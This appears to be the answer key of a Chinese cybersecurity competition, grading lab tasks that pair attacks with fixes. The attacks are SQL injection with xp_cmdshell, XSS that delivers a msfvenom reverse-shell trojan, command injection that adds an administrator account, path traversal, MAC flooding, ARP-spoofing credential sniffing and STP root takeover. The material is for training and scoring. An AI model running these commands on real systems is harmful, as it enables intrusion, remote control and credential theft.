1. Web访问DCST中的WebServ2003服务器,进入login.php页面,分析该页面源程序,找到提交的变量名,并截图;(5分) 找到源程序:(2分)
页面标题:
2. 对该任务题目1页面注入点进行SQL注入渗透测试,使该Web站点可通过任意用户名登录,并将测试过程截图;(5分)
构造注入语句:
username:任意用户名 password:含:or X=’X (X为任意值) (3分)
同时包含截图:
1、通过任意用户名登录(截图)
2、登录成功页面(截图)
(2分)
3. 进入DCST中的WebServ2003服务器的C:\\AppServ\\www目录,找到loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并将修改后的PHP源程序截图;(10分)
(10分) 包含语句: 1、
select password from users where username=’$username’ 2、
if($obj->password==$password)
4. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行SQL注入渗透测试无效,并将验证过程截图;(5分) 同时包含截图:
1、通过任意用户名登录(截图)
2、登陆后,页面出现用户名不存在提示;(截图)
(5分)
5. Web继续访问DCST中的WebServ2003服务器,\"/\"->\"Employee Information Query\",分析该页面源程序,找到提交的变量名,并截图;(5分) 找到源程序:(2分)
找到的源程序含有页面标题:
找到提交的变量名(3分) name=\"usernm\"
6. 对该任务题目5页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将测试过程截图;(5分)
(2分)
输入“%”,返回所有用户信息(截图)
输入“_”,返回所有用户信息(截图) (3分)
7. 通过对该任务题目5页面注入点进行SQL注入渗透测试,删除DCST中的WebServ2003服务器的C:\\目录下的1.txt文档,并将注入代码及测试过程截图;(5分)
构造注入语句:
‘exec master.dbo.xp_cmdshell ‘del c:\\1.txt’-- (5分)
8. 进入DCST中的WebServ2003服务器的C:\\AppServ\\www目录,找到QueryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入渗透测试,并将修改后的PHP源程序截图;(10分)
截图:
在服务器场景QueryCtrl.php源程序语句:$keyWord=$_REQUEST[‘usernm’]之后加入:
(10分)
9. 再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。(5分)
通过:‘exec master.dbo.xp_cmdshell ‘del c:\\1.txt’— 再次进行SQL注入截图;
系统出现错误提示:Bad KeyWord!(截图) (5分)
任务2:XSS和CSRF攻防(65分)
1. Web访问DCST中的WebServ2003服务器,\"/\"->\" Employee Message Board\",分析该页面源程序,找到提交的变量名,并截图;(5分) 找到源程序:(2分)
含有页面标题:
2. 对该任务题目1页面注入点进行XSS渗透测试,并进入\"/\"->\" Employee Message Board\"->\"Display Message\"页面,根据该页面的显示,确定是注入点,并将测试过程截图;(5分)
构造注入代码:(2分)
测试注入成功:(3分)
弹出alert(\"Hacker!\")括号中的消息;
3. 对该任务题目1页面注入点进行渗透测试,使\"/\"->\" Employee Message Board\"->\"Display Message\"页面的访问者执行网站(http://hacker.org/)中的木马程序:
http://hacker.org/TrojanHorse.exe,并将注入代码及测试过程截图;(5分)
构造注入代码:(2分)
测试过程:(3分)
名称:trojanhorse.exe 发送者:hacker.org
4. 通过IIS搭建网站(http://hacker.org/),并通过Kali生成木马程序TrojanHorse.exe,将该程序复制到网站(http://hacker.org/)的WWW根目录下,并将搭建该网站结果截图;(5分) 搭建IIS(1分)
Internet信息服务: 网站目录下存放: trojanhorse.exe 搭建DNS(1分)
正向查找区域:主机(截图) Zone:Org 主机:hacker
Metasploit Framework:TrojanHorse.exe生成 (3分) root@bt:~#Ifconfig (截图)
显示Kali IP地址:X.X.X.X
截图包含:
root@bt:~#msfvenom –p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=80 –f exe –o trojanhorse.exe
5. 当\"/\"->\" Employee Message Board\"->\"Display Message\"页面的访问者执行网站(http://hacker.org/)中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程控
制,打开访问者主机的CMD.exe命令行窗口,并将该操作过程截图;(5分)
Metasploit Framework:Hacker Reverse Tcp连接客户端 (2分)
root@bt:~#msfconsole
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST X.X.X.X LHOST => X.X.X.X
msf exploit(handler) > set LPORT 80 LPORT => 80
msf exploit(handler) > exploit
[*] Started reverse handler on X.X.X.X:80 [*] Starting the payload handler... (截图中包含黄色部分)
访问者主机需要被Kali主机远程控制(3分) Kali MSF提示(截图)包含如下信息 Kali IP:X.X.X.X 访问者主机IP:Y.Y.Y.Y
[*] Sending stage (…… bytes) to Y.Y.Y.Y
[*] Meterpreter session 1 opened (X.X.X.X:Port1 -> Y.Y.Y.Y:Port2) at …… meterpreter >
Kali截图包含打开访问者主机的CMD.exe命令行窗口;
6. 进入DCST中的WebServ2003服务器的C:\\AppServ\\www目录,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS渗透测试,并将修改后的PHP源程序截图;(10分) (10分)
在服务器场景原insert.php程序语句$info=$_REQUEST[‘message’]后加入:
绿色部分,通过替换函数,通过其它字符({},(),[]等字符)替换字符“<”和“>”均可得分; $info=str_replace(“<”,”(”,$info); $info=str_replace(“>”,”)”,$info); 或
$info=str_replace(“<”,”{”,$info);
$info=str_replace(“>”,” }”,$info); 或
$info=str_replace(“<”,”[”,$info); $info=str_replace(“>”,” ]”,$info);
7. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效,并将验证过程截图;(5分)
SQL Server企业管理器中,Message表中info字段注入语句符号“<”和“>”被替换为上一题替换后的字符;同时Communication Message页面显示Content:注入语句符号“<”和“>”被替换为上一题替换后的字符; (5分)
8. Web访问DCST中的WebServ2003服务器,\"/\"->\" Shopping Hall\",分析该页面源程序,找到提交的变量名,并截图;(5分)
找到源程序:(2分)
页面标题为:
9. 对该任务题目1页面注入点进行渗透测试,使\"/\"->\" Employee Message Board\"->\"Display Message\"页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看\"/\"->\"PurchasedGoods.php页面,并将注入代码及测试过程截图;(5分) 构造注入代码:(2分)
WebServer IP:X.X.X.X
测试过程:(3分)
截图:
Goods:CPU----数值大于或等于999999
10.进入DCST中的WebServ2003服务器的C:\\AppServ\\www目录,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御CSRF渗透测试,并将修改后的源程序截图;(10分)
截图:
服务器场景DisplayMessage.php程序语句: echo “Content:”.”$obj->info”.”……” 替换为:
echo “Content:”.strip_tags(”$obj->info”).”……” (10分)
11.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行CSRF渗透测试无效,并将验证过程截图;(5分)
(5分)
得分点:直接显示代码信息,而不是将代码执行; (截图)
SQL Server企业管理器中,Message表中info字段注入语句含有标记;同时Communication Message页面显示Content:注入语句不含有标记;
任务3:命令注入与文件包含攻防(50分)
1. Web访问DCST中的WebServ2003服务器,\"/\"->\" Display Directory\",分析该页面源程序,找到提交的变量名,并截图;(5分)
找到源程序:(2分)
页面标题:
2. 对该任务题目1页面注入点进行渗透测试,使页面
DisplayDirectoryCtrl.php回显C:\\Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码及测试过程截图;(5分) 注入语句:(2分)
WINDOWS | net user Hacker P@ssword /add
WINDOWS | net localgroup administrators Hacker /add 测试成功:(3分) 截图:
含有:命令成功完成。
3. 进入DCST中的WebServ2003服务器的C:\\AppServ\\www目录,找到DisplayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御命令注入渗透测试,并将修改后的源程序截图;(10分)
(10分) 包含语句: $str=’|’
if(strstr($directory,$str)==false)
4. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试无效,并将验证过程截图;(5分)
截图1:利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;
含有本任务第2题的命令注入语句; WINDOWS | net user Hacker P@ssword /add
WINDOWS | net localgroup administrators Hacker /add 截图2:页面出现非法输入提示;
含有本任务题目3修改后代码中的错误提示信息; 本案例提示信息为:illegal input! (5分)
5. Web访问DCST中的WebServ2003服务器,\"/\"->\" Display Uploaded's File Content\",分析该页面源程序,找到提交的变量名,并截图;(5分) 找到源程序:(2分)
页面标题:
找到提交的变量名:(3分) name=\"filename\"
6. 对该任务题目5页面注入点进行渗透测试,使页面
DisplayFileCtrl.php回显DCST中的WebServ2003服务器访问日志文件:AppServ/Apache2.2/logs/access.log的内容,并将注入代码及测试过程截图;(5分) 构造注入代码:(2分)
..\\..\\..\\AppServ\\Apache2.2\\logs\\access.log 回显DCST中的WebServ2003服务器访问日志文件:显示出AppServ/Apache2.2/logs/access.log的内容:(3分)
Internet Explorer地址栏中须含有: DisplayFileCtrl.php?filename=
7. 进入DCST中的WebServ2003服务器的C:\\AppServ\\www目录,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御文件包含渗透测试,并将修改后的源程序截图;(10分)
(10分) 包含语句: $str=’..’
if(strstr($directory,$str)==false)
8. 再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行文件包含渗透测试无效,并将验证过程截图。(5分)
截图1:利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;
输入框含有本任务题目6的注入代码:
..\\..\\..\\AppServ\\Apache2.2\\logs\\access.log 截图2:页面出现非法输入提示;
含有本任务题目7修改后代码中的错误提示信息; 本案例提示信息为:illegal input! (5分)
任务4:数据窃取防护:二层攻防(45分)
1. 将PC1、Kali所连接端口划入与WAF同一VLAN(VLAN10),并将PC1、Kali分配与DCST服务器相同网段IP地址,使PC1、Kali、DCST中的WebServ2003服务器能够在同一个网段(VLAN10)内相互Ping通。(2分) 截图:
PC1、Kali、DCST同在VLAN10;(#show vlan)
VLAN10中包含的接口数>=3;
WebServer IP配置(与参数表中服务器场景的IP地址一致):
PC1 IP地址配置(与参数表中PC1的IP地址一致):
PC3 IP地址配置(与参数表中PC3的IP地址一致):
三个终端之间能够相互Ping通;
在同一个窗口ping通除了本机外的2个IP地址;
2. 查看DCRS交换机VLAN10的MAC地址表容量信息,并将DCRS交换机配置相关参数、查看命令、查看结果截图。(3分)
#show mac-address-table count vlan 10
DCRS地址表空间中有可用的空间; 当前地址表记录数少于地址表容量; Max entires…… Total……:16384 Current entires…… Total……:该数值小于10
3. 从Kali发起MAC Flooding渗透测试,使DCRS交换机的MAC地址表溢出,使其在MAC地址表溢出的条件下,无法学习到PC1和DCST中的WebServ2003服务器的MAC地址表信息,查看DCRS交换机的MAC地址表信息,并将渗透测试过程截图。(5分)
Kali#macof
(2分)
#show mac-address-table count vlan 10
当前地址表记录数等于地址表容量; Max entires…… Total……:16384 Current entires…… Total……:该数值=16384 (3分)
4. Kali打开wireshark,验证在DCRS交换机MAC地址表溢出的条件下,可以监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将该验证过程截图。(5分) PC1通过Internet Explorer访问;(截图)
地址栏包含:
服务器场景IP(匹配参数表服务器场景IP)/……
Kali打开wireshark,监听到PC1通过Internet Explorer访问DCST服务器场景的HTTP流量;
截图:
Source:PC1的IP地址(与参数表一致)
Destination:服务器场景的IP地址(与参数表一致) Protocol:HTTP
(5分)
5. 在DCRS交换机Kali所连接端口配置Port Security特性,阻止Kali发起MAC Flooding渗透测试,验证此时DCRS交换机MAC地址表能够学习到PC1、DCST中的WebServ2003服务器的MAC地址,并将DCRS交换机相关配置信息以及验证信息截图。(8分) 配置截图包含:
mac-address-learning cpu-control (2分)
在VLAN10每个接口全部启用如下: Interface Ethernet1/0/X switchport port-security (2分)
#clear mac-address-table dynamic (2分)
#show mac-address-table count vlan 10
DCRS地址表空间中有可用的空间;
当前地址表记录数少于地址表容量; Max entires…… Total……:16384 Current entires…… Total……:该数值小于10 (2分)
6. 在DCRS交换机配置Port Security特性的条件下,Kali再次打开wireshark,监听PC1访问DCST中的WebServ2003服务器流量,验证此时Kali无法监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将验证过程截图。(7分) PC1通过Internet Explorer访问服务器场景;(截图)
地址栏包含:
服务器场景IP(匹配参数表服务器场景IP)/……
Kali打开wireshark,监听不到PC1通过Internet Explorer访问DCST的HTTP流量;(截图)
Filter:http 显示报文数:空
任务5:数据窃取防护:ARP攻防(45分)
1. 在PC1访问DCST中的WebServ2003服务器时,查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将PC1和DCST中的WebServ2003服务器的ARP缓存信息截图。(5分)
PC1、WebServ2003 Ipconfig/all
分别显示PC1、WebServ2003的IP和MAC; PC1的IP和MAC:
服务器场景的IP和MAC:
PC1通过Internet Explorer访问服务器场景;(截图)
地址栏包含:
服务器场景IP(匹配参数表服务器场景IP)/……
PC1:ARP表项内容为
WebServ2003的IP->WebServ2003的真实的MAC;
WebServ2003:ARP表项内容为 PC1的IP-> PC1的真实的MAC;
2. 在Kali对PC1进行ARP Spoofing渗透测试,使PC1无法访问DCST中的WebServ2003服务器,PC1的ARP缓存为:DCST中的WebServ2003服务器IP->Kali的MAC地址,在PC1查看被Kali毒化后的ARP缓存信息,并将该信息截图。(5分) Kali:
#arpspoof –t PC1_IP WebServ2003_IP
(过程截图) (2分)
PC1:ARP表项内容为
WebServ2003的IP->Kali的MAC;
Kali MAC:ifconfig (截图)
(3分)
3. 在Kali对PC1和DCST中的WebServ2003服务器进行ARP中间人渗透测试,使Kali能够使用wireshark监听到PC1向DCST中的WebServ2003服务器的LoginAuth.php页面提交的登录网站用户名、密码参数,并将该渗透测试过程截图。(7分) Kali:
#arpspoof –t PC1_IP WebServ2003_IP
#arpspoof –t WebServ2003_IP PC1_IP
# echo 1 > /proc/sys/net/ipv4/ip_forward
(3分)
PC1通过Internet Explorer访问服务器场景;(截图)
地址栏包含:
服务器场景IP(匹配参数表服务器场景IP)/success.php
Kali打开wireshark,监听到PC1通过Internet Explorer访问DCST服务器场景的HTTP流量;(截图)
截图中包含PC1通过Internet Explorer访问DCST服务器场景的用户名、密码;
包含:usernm=XXX&passwd=XXX (4分)
4. 在DCRS交换机上配置Access Management特性阻止Kali发起ARP Spoofing渗透测试,并将DCRS交换机该配置信息截图。(5分)
配置截图包含: am enable (2分)
只在连接Kali的接口配置: Interface Ethernet1/0/X am port
am mac-ip-pool Mac(Kali) IP(Kali) (3分)
5. 在DCRS交换机上配置Access Management特性的条件下,再次在Kali对PC1和DCST中的WebServ2003服务器进行ARP Spoofing渗透测试,此时DCRS交换机的Access Management特性能够阻止Kali对PC1和DCST中的WebServ2003服务器进行ARP Spoofing渗透测试,再次查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将该信息截图。(8分) (4分)
PC1:ARP表项内容为
WebServ2003的IP->WebServ2003的真实的MAC;
(4分)
WebServ2003:ARP表项内容为 PC1的IP-> PC1的真实的MAC;
6. 在DCRS交换机上删除Access Management技术配置,通过IP DHCP Snooping Bind特性来阻止Kali发起ARP Spoofing渗透测试,并将DCRS交换机相关配置信息截图。(7分)
配置截图包含:
ip dhcp snooping enable (1分)
ip dhcp snooping vlan 10 (1分)
ip dhcp snooping binding enable (1分)
ip dhcp snooping binding user Mac(Kali) address IP(Kali) vlan 10 interface Ethernet1/0/X(Kali连接的接口) (2分)
在Kali连接的接口配置: Interface Ethernet1/0/X
ip dhcp snooping binding user-control (2分)
7. 在DCRS交换机上配置IP DHCP Snooping Bind特性的条件下,再次在Kali对PC1和DCST中的WebServ2003服务器进行ARP Spoofing渗透测试,此时DCRS交换机的IP DHCP Snooping Bind特性能够阻止Kali对PC1和DCST中的WebServ2003服务器进行ARP Spoofing渗透测试,再次查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将该信息截图。(8分) (4分)
PC1:ARP表项内容为
WebServ2003的IP->WebServ2003的真实的MAC;
(4分)
WebServ2003:ARP表项内容为 PC1的IP-> PC1的真实的MAC;
任务6:数据窃取防护:生成树攻防(40分)
1. 在DCRS交换机开启生成树协议,生成树协议模式为STP,DCRS交换机优先级为0,防止网络出现物理环路,显示DCRS交换机生成树协议的状态,并将该信息截屏;(5分) STP配置:(2分) 配置截图包含: spanning-tree
spanning-tree mode stp spanning-tree mst 0 priority 0
显示DCRS交换机生成树协议的状态: (3分) #show spanning-tree
Root ID:this Switch(必须)
2. 在Kali向DCRS交换机发起Take Over The Root Bridge渗透测试,使DCRS交换机认为Kali为Root Bridge,显示DCRS交换机生成树协议的状态,并将该信息截屏;(5分) Kali: Yersinia –G(截图)
Claiming Root Role(选择) (2分)
Root ID:为Kali的ID(Root ID近似等于Self Bridge Id) (3分)
3. 配置DCRS交换机生成树协议安全特性,阻止Take Over The Root Bridge渗透测试,并将DCRS交换机相关配置信息截屏;(7分) 法一: 配置截图包含:
VLAN10的每个接口都做:
Switch(config-if-ethernet1/0/X)#spanning-tree rootguard 法二: 配置截图包含:
VLAN10的每个接口都做:
Switch(config-if-ethernet1/0/X)#spanning-tree portfast bpduguard recovery (任意值) 法三: 配置截图包含:
VLAN10的每个接口都做:
Switch(config-if-ethernet1/0/X)#spanning-tree portfast bpdufilter
4. 在DCRS交换机配置生成树协议安全特性的条件下,DCRS交换机不会认为Kali为Root Bridge,由Kali再次向DCRS交换
机发起Take Over The Root Bridge渗透测试,再次显示DCRS交换机生成树协议的状态,并将以上验证过程截屏;(8分)
Claiming Root Role(选择) (4分)
Root ID:this switch (4分)
5. 由Kali向DCRS交换机发起BPDU DOS渗透测试,提高DCRS交换机CPU的利用率,显示DCRS交换机CPU的利用率,并将该信息截屏;(5分)
选择:Sending conf BPDUs (2分)
渗透前交换机CPU的利用率
渗透后交换机CPU的利用率
CPU的利用率须大于正常的CPU利用率(与正常CPU利用率进行比较) (3分)
6. 配置DCRS交换机生成树协议安全特性,阻止BPDU DOS渗透测试,并将配置信息截屏;(5分)
配置截图包含:
VLAN10的每个接口都做:
Switch(config-if-ethernet1/0/X)#spanning-tree portfast bpduguard recovery (任意值)
7. 在DCRS交换机配置生成树协议安全特性的条件下,DCRS交换机不会受Kali的BPDU DOS渗透测试影响,此时由Kali再次向DCRS交换机发起BPDU DOS渗透测试,显示DCRS交换机CPU的利用率,并将该验证截屏;(5分)
选择:Sending conf BPDUs (2分)
渗透前交换机CPU的利用率
渗透后交换机CPU的利用率
CPU的利用率在渗透前后须无明显变化 (3分)
因篇幅问题不能全部显示,请点此查看更多更全内容
Copyright © 2019- huatuo0.cn 版权所有 湘ICP备2023017654号-2
违法及侵权请联系:TEL:199 18 7713 E-MAIL:2724546146@qq.com
本站由北京市万商天勤律师事务所王兴未律师提供法律服务